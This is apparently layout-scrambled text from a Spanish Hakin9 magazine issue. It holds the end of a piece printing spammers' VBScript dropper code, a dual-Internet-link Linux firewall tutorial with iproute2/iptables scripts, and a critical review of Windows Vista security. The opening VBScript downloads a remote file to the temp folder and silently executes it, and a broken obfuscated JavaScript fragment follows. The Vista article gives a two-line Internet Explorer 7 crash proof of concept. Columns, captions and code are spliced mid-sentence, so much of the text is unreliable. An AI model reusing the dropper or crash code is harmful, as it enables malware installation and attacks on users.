Set df = document.createElement("object")
df.setAttribute "classid", clID1&clID2
Set x = df.CreateObject(XML1&XML2,"")
set S = df.createobject(AdoSqa1&AdoSqa2,"")
S.type = 1
x.Open oGet, dl, False
x.Send
set F = df.createobject(SFO,"")
set tmp = F.GetSpecialFolder(2)
fname1 = F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject(SApp,"")
Q.ShellExecute fname1,"","","open",0
Listado 11. Ejemplo del código usado por los spammers
var a=' Replaced';
var e=256,x=0,o="",t=new Array(4113),s="Ñ#Ñx2";
function g(s,f){if(s.length=1)&256)==0)
{if((c=g(s,0))==e)break;l=c|65280;}if(l&1){if((c=g(s,1))==e)break;
os+=c;t[r++]=c;r&=4095;}else{if((i=g(s,0))==e)break;
if((j=g(s,0))==e)break;i|=((j&240)

Firewall con 2 canales
de Internet
Samuel Diaz
El acceso a Internet ya no debe depender
de un único proveedor, para estar presente
en la red se debe asegurar que tanto
la infraestructura tecnológica como los canales
de comunicaciones se encuentren disponibles
en todo momento. Al surgir esta necesidad y no
encontrar un documento que me pudiera ayudar
a solucionar esta problemática en conjunto, me
di a la tarea de plasmar mis experiencias en la
solución de esta problemática. Para atacar este
problema se debe dividir es 2 partes:
• Seguridad
• Enrutamiento
La parte de seguridad se trabaja con iptables,
para crear reglas de filtrado de paquetes
que permitan la salida hacia Internet de los
usuarios por un canal o por el otro, según
sean creadas estas reglas (reglas de NAT).
La parte de enrutamiento se trabaja con
un proyecto llamado iproute2 http://linuxnet.osdl.org/index.php/Iproute2
el cual nos
permite realizar la tarea de enrutamiento por
bien sea por un canal o por el otro. Este proyecto
como iptables ya se encuentra disponible
en una gran mayoría de distribuciones.
24 www.hakin9.org/es
El presente documento nace
de la necesidad que surgió de
poder configurar un acceso a
Internet a través de 2 canales,
utilizándolos simultáneamente.
Todo esto debe lograrse sin
modificar la estructura de red
actual, o conservando el acceso
a todos los recursos que los
usuarios tienen antes de esta
implementación.
Para que todo en conjunto funcione correctamente
la parte de seguridad y el enrutamiento
deben ir de la mano con las mismas configuraciones
y los mismos parámetros.
Procedimiento para configurar
un firewall en linux con accesso
a dos canales de internet
El diagrama de red presentado (Figura 1) se
compone básicamente de una red DMZ con
direccionamiento 10.10.10.0/24, cuyo default gateway
es 10.10.10.70 y se encuentra conectada a
la interfase eth2. Se tienen dos canales de Internet
en redes diferentes, la primera se encuentra
En este artículo aprenderás
• Usar un dispositivo de seguridad atraves de 2
canales.
• Como configurar firewall, como protección de
informacion privada en Linux.
Lo que deberias saber
• Un cortafuegos no puede protegerse contra
ataques desde su punto de operación.

en la red 192.168.1.0/24 conectada a
la interfase eth0 y con dirección IP
192.168.1.70, para esta red se cuenta
con un gateway 192.168.1.1. El segundo
canal se encuentra conectado
a la interfase eth3 y con dirección IP
192.168.9.70, este canal cuenta con
el gateway 192.168.9.111. La red LAN
se encuentra conectada a la interfase
eth1 y con una dirección de red
172.16.1.0/24, el default gateway de
esta red es 172.16.1.70. Desde esta
red se tiene un enrutador que conecta
a la red WAN con las sedes de las ciudades
principales, ejemplo, Medellín,
Cali, Barranquilla, etc. La dirección
de este enrutador en la sede principal
es 172.16.1.1, Por ejemplo, la sede
de Medellín tiene la dirección de red
172.17.1.0/24 y Cali tiene 172.17.1.0/
24. En este laboratorio se probará
un balanceo de carga manual sobre
los canales de Internet, para esto se
situarán diferentes equipos detrás del
firewall, los equipos ubicados en la
DMZ tendrán la siguiente información
de red:
Equipo1DMZ Equipo2DMZ
IP= 10.10.10.1/24 IP= 10.10.10.15/24
GW= 10.10.10.70 GW= 10.10.10.70
DNS1= 200.21.200.2 DNS1= 200.21.200.2
DNS2= 63.171.232.38 DNS2= 63.171.232.38
Continuando con el laboratorio, el
Equipo1DMZ saldrá por el primer canal
de Internet, o sea por el gateway
192.168.1.1, y el Equipo2DMZ saldrá por
Primer Canal de Internet
192.168.1.0/24
IP=192.168.9.70
GW=192.168.9.111
Segundo Canal
de Internet
192.168.9.0/24
Figura 1. El diagrama de red
Firewall con 2 canales de Internet
el segundo canal de Internet, o sea por
el gateway 192.168.9.111. Estos equipos
tendrán salida directa a Internet a
través de reglas de NAT, lo cual les permitirá
salir libremente hacia Internet. Se
situará otro equipo en la red LAN con la
siguiente información de red:
Equipo1LAN
IP= 172.16.1.50/24
GW= 172.16.1.70
DNS1= 200.21.200.2
DNS2= 63.171.232.38
Este equipo tendrá una regla de NAT
que le permite salir libremente hacia
Internet. Para complementar este laboratorio
se puede situar otro equipo
en la red LAN con la siguiente información
de red:
Equipo2LAN
IP= 172.16.1.100/24
GW= 172.16.1.70
DNS1= 200.21.200.2
DNS2= 63.171.232.38
Este equipo no tendrá salida a Internet
directamente, ya que en las reglas de
firewall no se configurará una regla de
NAT que le permita la salida libre a Internet.
Se puede configurar un servidor
Proxy, que les permita el acceso a los
equipos que no tienen salida directa.
Este equipo saldrá por el primer canal
de Internet, por el gateway 192.168.1.1.
El enrutador ubicado en la red LAN
tendrá dirección IP 172.16.1.1, y este
IP=192.168.1.70
GW=192.168.1.1
IP=10.10.10.70
IP=172.16.1.70
DMZ
10.10.10.0/24
LAN
172.16.1.0/24
www.hakin9.org/es
IP=172.16.1.1
será la puerta de enlace para poder
llegar a las regionales. Los clientes
únicamente tendrán como default gateway
el firewall, y este a su vez tendrá
la tabla de enrutamiento para poder
brindar acceso a Internet, junto con la
información de rutas para llegar a las
regionales a través del enrutador ubicado
en la LAN. El primer paso debe
ser tener el firewall Linux configurado
con la siguiente información de red:
Nombre interface= eth0
IP=192.168.1.70/24
Nombre interface= eth1
IP=172.16.1.70/24
Nombre interface= eth2
IP=10.10.10.70/24
Nombre interface= eth3
IP=192.168.9.70/24
Se debe editar el archivo /etc/
iproute2/rt _ tables e ingresar la
información con las tablas que se
utilizarán.
201 T1
202 T2
Para este ejemplo se utilizarán dos
tablas. T1 y T2. Los nombres de las
tablas no son importantes, se les
puede dar el nombre que se desee,
siempre y cuando se ingresen en el
archivo /etc/iproute2/rt _ tables, y
después sean utilizadas en el script
de enrutamiento. Para este ejemplo
T1 será la tabla con la cual se utiliza-
GW=172.17.1.1
GW=172.18.1.1
WAN
MEDELLIN
172.17.1.0/24
CALI
172.18.1.0/24
25

kit
ra el primer canal de Internet, cuyo
default gateway es 192.168.1.1. Y T2
será la tabla de enrutamiento que
utilizará el segundo canal de Internet
con default gateway 192.168.9.111.
Una vez se tienen estos datos configurados,
se debe generar un script
para la tabla de enrutamiento con la
siguiente información (ver Listado
1). Después de tener listo el enruta-
Listado 1. Primer canal de internet (default gateway
es 192.168.1.1.)
#!/bin/bash
# Samuel Diaz
# Enero de 2007
# Bogota - Colombia
#Tabla de Rutas Red de pruebas
# Se limpian las tablas de enrutamiento y se reinician
las interfaces de red para limpiar todas las posibles
rutas que se tengasn
echo "Limpiando Tablas de enrutamiento"
ip route flush all
ip route flush table 201
ip route flush table 202
ip route flush table 222
ip rule show | grep -Ev '^(0|32766|32767):' \
| while read PRIO RULE; do
ip rule del prio ${PRIO%%:*} $( echo $RULE | sed
's|all|0/0|' )
ip rule del prio ${PRIO%%:*} $( echo $RULE )
done
ip route flush default
rcnetwork restart
#Definicion de interfaces de red, Redes locales, DMZ y
redes de canales de Internet.
echo "Configuracion Automatica de Rutas"
# Interface eth0, Primer canal
IF0="eth0"
# Interface eth1, red local
IF1="eth1"
# Interface eth2, DMZ
IF2="eth2"
# Interface eth3, segundo canal
IF3="eth3"
# IP eth0, primer canal
IP0="192.168.1.70"
# IP eth1, red local
IP1="172.16.1.70"
# IP eth2, DMZ
IP2="10.10.10.70"
# IP eth3, segundo canal
IP3="192.168.9.70"
# Gateway Primer Canal de Internet
P0="192.168.1.1"
# Gateway Segundo Canal de Internet
P3="192.168.9.111"
# Red primer canal
P0_NET="192.168.1.0/24"
# Red local
P1_NET="172.16.1.0/24"
# Red DMZ
P2_NET="10.10.10.0/24"
miento, se deben crear las reglas de
firewall para permitir el tráfico, junto
con las reglas de NAT para completar
el ejercicio. Para esto se crea otro
script con las políticas de firewall.
Este es el strip creado, donde únicamente
se le asignas permisos de salida
a las ips del ejercicio, junto con
las reglas de NAT para este ejemplo
(ver Listado 2). NOTA: Para este
26 www.hakin9.org/es
ejemplo se deben tener en cuenta
las siguientes condiciones:
• La IP= 10.10.10.20 utilizará el
canal de la red 192.168.1.X, para
esto se debe crear una regla
de NAT que haga NAT con la
dirección IP del firewall que se
encuentra en esa red, en este
caso la ip 192.168.1.69.
# Red Segundo Canal
P3_NET="192.168.9.0/24"
# Definicion de regionales
#Medellin
MEDELLIN="172.17.1.0/24"
#Cali
CALI="172.18.1.0/24"
# Se definen las rutas de las redes donde se encuentran las
# salidas de internet, junto con el gateway de cada
# canal y se asocian a las tablas T1 y T2.
ip route add $P0_NET dev $IF0 src $IP0 table T1
ip route add default via $P0 table T1
ip route add $P3_NET dev $IF3 src $IP3 table T2
ip route add default via $P3 table T2
ip route add $P0_NET dev $IF0 table T1
ip route add $P3_NET dev $IF3 table T1
ip route add $P2_NET dev $IF2 table T1
ip route add 127.0.0.0/8 dev lo table T1
ip route add $P0_NET dev $IF0 table T2
ip route add $P3_NET dev $IF3 table T2
ip route add $P1_NET dev $IF1 table T2
ip route add 127.0.0.0/8 dev lo table T2
#Se asocian la red local y DMZ para que se tenga
# enrutamiento en las 2 tablas.
ip route add $P2_NET dev eth2 table T1
ip route add $P2_NET dev eth2 table T2
ip route add $P1_NET dev eth1 table T2
ip route add $P1_NET dev eth1 table T1
ip route add $MEDELLIN via 172.16.1.1 dev eth1 table T1
ip route add $MEDELLIN via 172.16.1.1 dev eth1 table T2
ip route add $CALI via 172.16.1.1 dev eth1 table T1
ip route add $CALI via 172.16.1.1 dev eth1 table T2
#se define el default gateway del firewall
ip route add default via $P0
ip rule add from $IP0 table T1
ip rule add from $IP3 table T2
# Se crean las definiciones de los gateway de cada tabla,
# junto con que ip utilizaran esas tablas
#ip rule add from 10.10.10.20 table T1
ip rule add from 10.10.10.1/32 table T1
ip rule add from 10.10.10.15/32 table T2
ip rule add from 10.10.10.16/32 table T1
#ip rule add from 10.10.10.50 table T2
#ip rule add from 172.16.1.20 table T1
#ip rule add from 172.16.1.50 table T2
# Se refresca la tabla de cache
ip route flush cache
ip rule add from 172.16.1.0/24 table T1
ip rule add from $MEDELLIN table T1
ip route flush cache
#route add default gw 192.168.1.1
route add -net 172.17.1.0/24 gw 172.16.1.1

Listado 2. Segundo canal de internet ( default
gateway 192.168.9.111.)
#!/bin/sh
# Samuel Diaz
# Enero de 2007
# Bogota - Colombia
# modulos no implementados
modprobe ip_queue
modprobe ip_tables
modprobe ipt_MARK
modprobe ipt_REJECT
modprobe ipt_TCPMSS
modprobe ipt_TOS
modprobe ipt_tos
modprobe ipt_limit
modprobe ipt_mac
modprobe ipt_mark
modprobe ipt_multiport
modprobe ipt_owner
modprobe ipt_state
modprobe ipt_tcpmss
modprobe ipt_LOG
modprobe ipt_MASQUERADE
# Soporte para ftp, IRC
# Los modulos estan en /usr/include/linux/netfilter_ipv4
modprobe ip_conntrack
modprobe ip_conntrack_ftp
modprobe ip_conntrack_irc # Funciona en kernel 2.4.19
modprobe ip_nat_ftp
# Habilita enrutamiento
echo "1" > /proc/sys/net/ipv4/ip_forward
# Habilita IP Dinamico. 1=Habilitado, 0=No Habilitado
echo "0" > /proc/sys/net/ipv4/ip_dynaddr
# Limpia los canales
iptables -F INPUT
iptables -F FORWARD
iptables -F OUTPUT
iptables -F
iptables -X
iptables -t nat -F
• La IP= 10.10.10.50 utilizará el
canal de la red 192.168.9.X, para
esto se debe crear una regla
de NAT que haga NAT con la
dirección IP del firewall que se
encuentra en esa red, en este
caso la ip 192.168.9.69.
• Si se desea hacer un cambio, se
debe tener en cuenta el canal a
utilizar, para crear la regla de
NAT respectiva con la dirección
IP de ese segmento.
• Los scripts generados anteriormente
se pueden crear /etc/
init.d/rutas.sh y /etc/init.d/firewall
Sobre el Autor
Samuel Diaz - hsdiaz80@yahoo.com
samuel.diaz@globalteksecurity.com
Firewall con 2 canales de Internet
con permisos de ejecución y
para activarlos automáticamente
cuando se inicia la máquina se
pueden ejecutar los siguientes
comandos: Chkconfig --level 35
rutas on
Conclusión
Iproute2 permite a los administradores
poder tener disponibilidad de acceso
a Internet, adquiriendo varios canales
y utilizándoles simultáneamente, y en
caso de falla de alguno de ellos poder
enlutar todo el tráfico por el canal disponible
con unos pocos pasos y así no
perder conectividad. Este proyecto va
más allá de puro enrutamiento, permite
tener control sobre el tráfico TCP/IP
en nuestra máquina Linux. La gran
mayoría de los sistemas actuales están
www.hakin9.org/es
iptables -t nat -X
# La política es: todo es prohibido hasta que se diga
lo contrario
# Esta técnica se usa en Europa
iptables -P INPUT DROP
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
# La tarjeta de red local siempre debe permitir todo
iptables -A INPUT -i lo -j ACCEPT
iptables -A INPUT -i eth0 -j ACCEPT
iptables -A INPUT -i eth1 -j ACCEPT
#iptables -A INPUT -i eth2 -j ACCEPT
# Permite PING para hacer pruebas de conectividad
iptables -A INPUT -p icmp -j ACCEPT
# Nat - Permite a los PC de LAN salir a internet
#*** NAT - ESTAS DIR. IP TIENEN ACCESO A TODOS LOS
SERVICIOS ***
iptables -t nat -A POSTROUTING -j SNAT -s 172.16.1.15/32
--to 192.168.1.70
iptables -t nat -A POSTROUTING -j SNAT -s 172.16.1.20/32
--to 192.168.1.70
iptables -t nat -A POSTROUTING -j SNAT -s 172.17.1.50/32
--to 192.168.1.70
iptables -t nat -A POSTROUTING -j SNAT -s 10.10.10.1/32
--to 192.168.1.70
iptables -t nat -A POSTROUTING -j SNAT -s 10.10.10.15/32
--to 192.168.9.70
iptables -t nat -A POSTROUTING -j SNAT -s 10.10.10.16/32
--to 192.168.1.70
iptables -t nat -I PREROUTING -p tcp -d 192.168.1.70
--dport 2525 -j DNAT --to 172.16.1.10:25
iptables -t nat -I PREROUTING -p tcp -d 192.168.9.70 -dport
25 -j DNAT --to 10.10.10.15:25
iptables -t nat -I PREROUTING -p tcp -d 192.168.9.70 -dport
21 -j DNAT --to 10.10.10.15:21
iptables -t nat -I PREROUTING -p tcp -d 192.168.1.70 -dport
21 -j DNAT --to 172.17.1.50:21
iptables -t nat -I PREROUTING -p tcp -d 192.168.1.70 -dport
25 -j DNAT --to 10.10.10.1:25
iptables -t nat -I PREROUTING -p tcp -d 192.168.1.70 -dport
80 -j DNAT --to 10.10.10.1:80
limitados a tener únicamente a nivel de
red una única salida a Internet , por lo
que con los cambios tecnológicos y
de infraestructura esta funcionalidad
se está volviendo obsoleta, haciendo
necesario que reflexionemos sobre
buscar alternativas a sistemas que ya
no dependan únicamente de un default
gateway, si no que tengan la posibilidad
de suplir esta necesidad, ya que las
compañías requieren siempre estar en
línea y no se permite tener excusa que
por falla en los canales de comunicaciones
la operación de la compañía se
vea interrumpida. Siempre se debe
tener presente que una falla puede
ocurrir y se debe estar preparado en
como solucionarla en el menor tiempo
posible y con los mínimos recursos
necesarios. l
27

Seguridad en
Windows Vista
Oscar Martínez Pérez
Vamos a ocuparnos de analizar sus sistemas
de seguridad y el concepto que tiene
este sistema operativo para asegurarnos
que merece la pena actualizar nuestros ya viejos
Windows XP. Windows Vista, centra su concepto
de seguridad en cuatro pilares básicos, Windows
defender, Copias de seguridad, Internet Explorer
7 y Medios de control parental.
Si entramos en el portal de Microsoft, podemos
observar como en su definición de Windows
defender, dicen hemos decidido ayudarte a
eliminar algunas cosas con Windows defender.
Cosas como elementos emergentes, spyware
y otro software no deseado. Nos imaginamos
que probablemente no lo echarías de menos.
Nota Mental: Aprovecho para decir, que pensar
en el usuario final, esta muy bien, y es muy
loable, sin embargo, decidir a estas alturas
como haciendo un favor a todos los usuarios
que durante años han sufrido las carencias
de seguridad de los sistemas operativos de
Microsoft, que nos quieren ayudar, cuando el
producto es de Microsoft, y las cifras multimillonarias
de esta empresa hablan por si solas, me
parece como profesional del gremio una falta
de respeto. No hace falta que nos digan que
sus sistemas operativos, han sido testeados
28 www.hakin9.org/es
El coloso Microsoft, que lanzó en
Octubre del 2001 Windows XP,
vuelve a la carga con una nueva
versión, de su sistema operativo
Windows, por el que ha recibido
durante años, críticas y alabanzas
de todo tipo. Según Microsoft
con esta nueva apuesta, lanza
un sistema operativo, mucho
más sencillo y divertido, pero
sobretodo seguro.
por los usuarios, y profesionales que durante
años hemos hecho de beta testers eso ya lo
sabemos.
Windows Defender
Por todos es sabido, lo molesto que es el
spyware, es por ello que Microsoft ha creado
En este artículo aprenderás
• El concepto de seguridad de Windows Vista.
• Los secretos de seguridad del nuevo antispyware
de Microsoft, Windows Defender.
• Vulnerabilidad DoS (denial of service) en Internet
Explorer . Como se puede colgar el nuevo
navegador Internet Explorer 7 con tan solo 5
lineas de código.
Lo que deberías saber
• Que es un ataque DoS: (denial of service):
Ataque a un sistema de ordenadores o red que
causa que un servicio o recurso sea inaccesible
a los usuarios legítimos.
• Que es un Fuzzer: Un fuzzer es un programa
que intenta descubrir vulnerabilidades de seguridad.

Windows defender, una aplicación
que no deja de ser un software antiespía
actual, auto actualizable online,
que detecta y elimina software
o programas espía. La aplicación es
gratuita y se puede descargar de:
http://www.microsoft.com/athome/
s e c u r i t y / s p y w a r e / s o f t w a r e /
default.mspx.
Actualmente el software está
disponible únicamente en inglés,
alemán y japonés, y para usarlo es
necesario disponer de una copia
legítima de Windows XP o 2003.Las
traducciones a más idiomas se irán
sucediendo posteriormente.
Windows defender viene incluido
en todas las versiones de Windows
Vista. En la primera versión Beta 2
de Windows Defender, se reportaron
la friolera de 400 fallos detectados
por unos 34 millones de personas
que lo testearon (¿quien ayuda a
quien? :-D). Microsoft asegura que
en la versión final todos estos errores
están solucionados.
Según Gerhard Eschelbeck, Director
de Tecnología y Vicepresidente
de Webroot Software: Felicitamos
a Microsoft por las notables mejoras
y nuevas ventajas que ofrece Windows
Vista. Sus distintas aplicaciones,
la mejora de las funciones de red y
del soporte gráfico le convierten en
un sistema operativo sorprendente.
Sin embargo, nos gustaría asegurarnos
de que los usuarios son
conscientes de las limitaciones de
Windows Vista. Es nuestro deber
prevenirles de que el sistema de
protección de Microsoft contra virus
y espías no protege al ordenador de
forma completa.
En las pruebas realizadas por
los ingenieros de Webroot, Windows
Defender, fue incapaz de bloquear el
84% de las amenazas incluidas en
una prueba con 15 de los elementos
de spyware y malware más habituales.
Además, en diversas pruebas
Figura 1. Windows vista al descubierto
realizadas por el mismo equipo de
ingenieros de Webroot, Vista, fue
incapaz de detectar diversas amenazas,
como adware, programas
potencialmente no deseados (Pups),
monitores de sistema, espías de teclado
(keylogers) y troyanos. Incluso,
uno de los pups, que se analizó llego
a instalarse con privilegios de administrador
del sistema, para grabar las
pulsaciones del teclado, y Windows
Defender no detecto ni la instalación
ni la ejecución del programa (http:
//www.webroot.com/land/Windows-
Vista-Ready.php?id=HOME-BO-
TTOM-vista#dam_malware).
En cuanto a las actualizaciones,
parte importante de cualquier sistema
de protección y detección de
software malicioso, Windows defender
lo realiza cada siete o diez días,
valorando deficientemente el margen
de tiempo durante el cual nuestro
sistema sería potencialmente vulnerable
contra amenazas de software
malicioso. Vista no sólo es susceptible
al ataque de software malicioso,
también está expuesto frente a
amenazas de virus, ya que en esta
nueva versión sigue sin aparecer
ninguna aplicación antivirus, con el
valor añadido de que los usuarios de
Microsoft Live OneCare (Aplicación
no gratuita, que ofrece los servicios
de, antivirus, cortafuegos, antiphishing,
antispyware, herramientas
administrativas y de mantenimiento,
ayuda en línea y copias de seguridad
automáticas ) pagarán 49,95€,
para estar protegidos ante los virus
y otras amenazas.
De esta forma Microsoft
vuelve a demostrar el afán desinteresado
por ayudar a sus
usuarios,¿Verdad?… todo un detalle
(http://onecare.live.com/site/es-es/
default.htm). Me gustaría recordar
que por el mes de Noviembre del
pasado 2006,para Live Onecare, un
mail de Gmail era un virus.
www.hakin9.org/es
Windows Vista
Increible, pero cierto…
Hay dos formas de pensar en este
asunto. Podemos pensar mal y llegar
a la conclusión de que Microsoft,
intentó una fase de competencia
desleal hacia los servicios de mensajería
electrónica que google ofrece.
Por otro lado podemos pensar
bien, y caer en la conclusión de que
se trata de un fallo de programación
del equipo de desarrollo de Windows
live Onecare, pensamiento que sinceramente
no resulta muy complejo.
En cualquier caso, la realidad
es que cuando teniendo activado el
servicio de Windows Live Onecare,
entrabamos a Gmail, desde nuestro
navegador web, y al tratar de abrir un
documento, Windows Live Oncare
nos mostraba una ventana advirtiéndonos
de que el documento que
estabamos tratando de abrir estaba
infectado por el virus BAT/BWG.A.
Deseo confirmar que esto era un
aviso de positivo falso y lo hemos
arreglado (...) Investigaremos cómo
sucedió este falso positivo y tomaremos
las medidas para minimizar los
riesgos de más incidentes, dijo Ziv
Mador, portavoz y coordinador del
equipo de AntiMalware de Microsoft.
De cualquier modo, se sirvió la
polémica, y los afectados finalmente,
para variar, los usuarios, que en cierto
momento no entendían si su sistema
Gmail, estaba o no infectado.
El nuevo navegador
web de Microsoft el
Internet Explorer,
versión 7
Posiblemente el cliente World Wide
Web es más extendido y de mayor
uso en el mundo. Ahora en todas
Figura 2. Interface de información
de detección de virus
29

kit
las versiones de Vista, va incluida
la versión 7 de Internet Explorer.
Internet Explorer 7, salio previo a
Windows Vista, y comenzó francamente
mal. Lo más característico de
su debut, fue un fallo de seguridad,
ya conocido en su antecesor Internet
Explorer 6.
Determina Security Research
descubrió una vulnerabilidad DoS en
multiples controles ActiveX incluidos
en Microsoft Internet Explorer.
Según confirma el Microsoft, esta
vulnerabilidad no puede ser utilizada
para la ejecución de código.
Los controles ActiveX vulnerables,
están disponibles por defecto
en todas las versiones del Internet
Explorer, en Windows 2000, XP y
Vista, en versiones para sistemas
operativos anteriores también son
vulnerables, pero no tienen soporte,
y por lo tanto no se publicarán actualizaciones.
La vulnerabilidad fue detectada
con un fuzzer al instanciar todos los
controles ActiveX en el sistema y
enumerar sus propiedades.
Determina Security Research, descubrió
que múltiples controles causan
errores de excepción, cuando
ciertas propiedades del objeto son
accedidas a través de un programa
en javascript.
La mayoría de los controles ActiveX,
vulnerables, se encuentran en
Figura 3. Colgando Internet Explorer 7
la librería MSHTML.DLL y pueden
ser explotados en todas las versiones
de Internet Explorer. Controles
Vulnerables:
• giffile,
• htmlfile,
• jpegfile,
• mhtmlfile,
• ODCfile,
• pjpegfile,
• pngfile,
• xbmfile,
• xmlfile,
• xslfile,
• wdpfile.
Microsoft Internet Explorer 7, acepta
de manera directa la tabla anterior
mostrada de controles ActiveX,
sin necesidad de solicitar la aceptación
del usuario. Es por ello que
el navegador incurre en un grave
fallo de seguridad y estabilidad.
Para que este tipo de ataque
tenga éxito, el usuario, ha de ser
convencido para que visite un sitio
malicioso y preparado para ello.
Sin embargo, en la actualidad los
conocimientos de la gran mayoría
de los internautas, sobre este tipo
de efectos, son todavía insuficientes,
estando gran parte de la comunidad
de usuarios en peligro, siempre que
existan este tipo de amenazas sin
solventar.
30 www.hakin9.org/es
Figura 4. Aviso emergente UAC
¿Queremos colgar el cliente web?
Es muy sencillo y con un código
muy simple.
obj = new ActiveXObject("giffile");
obj.bgColor;
Y como una imagen vale más que mil
palabras, probar vosotros mismos,
podéis cargar la siguiente url, en vuestro
navegador Internet Explorer 7 y
podréis comprobar como instantáneamente
este moderno y seguro navegador
web responde satisfactoriamente
a la vulnerabilidad que acabamos de
DoS (denial of service)
Ataque a un sistema de ordenadores
o red que causa que un servicio o
recurso sea inaccesible a los usuarios
legítimos. Normalmente provoca la
pérdida de la conectividad de la red por
el consumo del ancho de banda de la
red de la víctima o sobrecarga de los
recursos computacionales del sistema
de la víctima.
Se genera mediante la saturación
de los puertos con flujo de información,
haciendo que el servidor se sobrecargue
y no pueda seguir prestando servicios,
por eso se le dice denegación,
pues hace que el servidor no de abasto
a la cantidad de usuarios.
Spyware
El spyware es un software que recopila
información de un ordenador y después
transmite esta información a una
entidad externa sin el conocimiento o
el consentimiento del propietario del
ordenador.

estudiar (http://www.kriptopolis.org/
docs/explorer.html). Más información
en http://www.determina.com/
security.research/vulnerabilities/
activex-bgcolor.html.
¿Qué conseguimos colgando el
navegador? Realmente poca cosa,
más que demostrar la fragilidad
de un producto que lleva años en
el mercado, y que es una de las
características fundamentales que
ha lanzado Microsoft, en todos sus
sistemas operativos.
Las empresas de creación de software
deberían velar por la seguridad
de sus sistemas, además de gastar e
invertir mucho mas esfuerzo, para proteger
a lo que no me cansaré de repetir,
las verdaderas víctimas de estos fallos
informáticos, los usuarios finales.
Hoy en día, a la hora de presentar
un nuevo sistema informático
por alguna de las más poderosas
empresas de software del mundo,
es más probable, encontrarse ante
un espectáculo hollywoodiense que
un acontecimiento informático y profesional.
Donde podemos ver a los
principales responsables de estas
empresas, dando saltos, y gritos,
con una escenografía digna de cualquier
obra de teatro además de unos
efectos musicales y especiales que
seguramente hacen las delicias de
los más exigentes. Con todo esto sólo
Fuzzer
Un fuzzer es un programa que intenta
descubrir vulnerabilidades de
seguridad enviando una entrada
arbitraria a una aplicación. Si el
programa contiene una vulnerabilidad
que puede conducir a una
excepción, el choque o el error de
servidor, como en el caso de aplicaciones
web, puede ser determinado
que una vulnerabilidad ha sido descubierta.
ActiveX
Lenguaje desarrollado por Microsoft
para la elaboración de aplicaciones
exportables a la red y capaces de operar
sobre cualquier plataforma a través,
normalmente, de navegadores WWW.
trato de decir, que gastar verdaderas
fortunas en campañas publicitarias
tan exuberantes, mostrando al mundo
un producto inédito y revolucionario,
sería mucho más interesante, si las
acompañaran y respaldaran con la
conciencia que cualquier profesional
debe de tener en mente al realizar su
trabajo…. profesionalidad antes que
mercadería.
Si no teníamos suficiente con
el Spam. Vista nos trae la nueva
pesadilla emergente: UAC El User
Account Control, mecanismo que
intenta disminuir el efecto de código
peligroso, sobre algunas ope-
www.hakin9.org/es
Windows Vista
raciones de acceso a recursos del
sistema. Mediante este concepto
interactivo sistema usuario, esta tecnología
solicitará eventualmente al
usuario que proporcione y certifique
sus credenciales para poder realizar
determinadas acciones.
Si hemos iniciado una sesión
en el sistema como usuario sin privilegios
administrativos, a la hora
de realizar tareas que requieran la
credencial de administrador del sistema,
el UAC nos solicitará que nos
identifiquemos con una cuenta que
disponga de los privilegios administrativos
necesarios para realizar la
Tabla 1. Elementos de spyware y malware utilizadas por webroo
Malware Variación
AgentWinlogonHook Troyano
Backdoor-Banwarum@mm Troyano
Busky Troyano
CashDeluxe Adware
hacker defender Troyano
LDPinch Troyano
Loadcash.Biz Troyano
Peper Trojan Troyano
Playboy Dialer Adware
Search-x-org Hijacker Adware
SEPPBar Adware
TrojanDropper-Agent-ED Troyano
Update Notifier Fake Alert Adware
Worm-Licat Gusano
Zlob Troyano
Figura 5. Interface control Parental Vista
31

kit
acción. Dicho así, no sólo suena, lógico,
minucioso, e incluso tecnológicamente
moderno, sino fuera que desde
hace años, sistemas operativos Unix,
distribuciones gnu/Linux, Mac OS, ya
utilizan este concepto de seguridad
para proteger el acceso a recursos de
sistema. El problema más grave, y lo
que realmente incomoda al usuario,
es la frecuencia con que el UAC solicita
al usuario que se identifique, llegando
a interferir en el trabajo, terminando
por ser un sistema más molesto que
ventajoso. En las versiones Beta,
el ímpetu del UAC era tan exageradamente
espontáneo llegando a ser
tan desquiciante, que Microsoft en la
versión final a relajado su frecuencia
de apariciones.
Existe la posibilidad de que cualquier
usuario pueda desactivar el UAC,
pero lógicamente no sin exponer al
sistema a que ciertos programas realicen
cambios comprometiendo potencialmente
su seguridad, privacidad y
estabilidad.
Control Parental
Podemos controlar, desde límites horarios,
lugares que se navegan, tipo
de aplicaciones que se utilizan, hasta
Figura 6. Interface Sistemas Backup Vista
leer los logs de las conversaciones de
Microsoft Messenger. Es interesante
herramienta de control de usuarios,
donde Microsoft piensa en un uso
doméstico, para el control de los
menores, por parte de sus padres o
tutores. A nivel profesional, poco que
decir, que se podría espiar o restringir
la actividad de los usuarios, y recibir
informes. Incluye un sencillo y práctico
interface para configurar como administrador
del equipo las características
y restricciones que deseemos implementar
para un usuario concreto.
Sistema de copias
de seguridad
Anteriormente en Windows XP, se
introdujo la posibilidad de restaurar
el sistema a un estado anterior, sin
perder información personal.
Vista va más allá y ofrece una aplicación
de copias de seguridad, en las
versiones Home Premium, Business,
Ultimate y Enterprise.
La posibilidad de automatizar las
copias de seguridad, nos evita, tener
que recordar periódicamente realizar
las copias de seguridad manualmente.
Además en las versiones Business,
Ultimate y Enterprise, podemos reali-
32 www.hakin9.org/es
Sobre el Autor
Oscar Martinez Perez, Responsable
Dpto. de Sistemas y Desarrollo de
iTiDeaS Soluciones Informáticas
(www.itideas.es), con mas de 10 años
de experiencia como administrador de
sistemas y seguridad informática.
zar la restauración del sistema completo,
si en algún momento tenemos el
sistema corrupto.
El interface es muy intuitivo, y el
asistente nos ayudará paso a paso,
haciendo que realizar y automatizar
copias de seguridad sea una fácil
tarea. Una apuesta importante por
parte de Vista, en estos tiempos en
los que hablar de Teras de información
es ya un hecho. Cuando en
diversas reuniones con colegas del
gremio, se trata el tema del sistema
más duramente criticado y vulnerable
del planeta, siempre hablamos de la
criatura del gigante informático de
Redmond, Windows. Windows, es
sin duda alguna el sistema operativo,
instalado en el mayor porcentaje de
equipos informáticos del mundo, la
exposición por tanto de este sistema
a vulnerabilidades, y errores, es
mucho mayor, que la que tienen otros
sistemas operativos, de no tan extendido
uso. De todos modos, de nuevo
Microsoft, vuelve a ofrecer un sistema
operativo, con una durísima campaña
de marketing comercial, haciéndonos
creer que realmente estamos por fin
ante el Cáliz de la informática.
Finalmente comprobamos, que
el sistema operativo sigue teniendo
fallos que los usuarios vamos reportando.
Vender un sistema como
lo está haciendo Microsoft, con un
concepto de seguridad tan elevado,
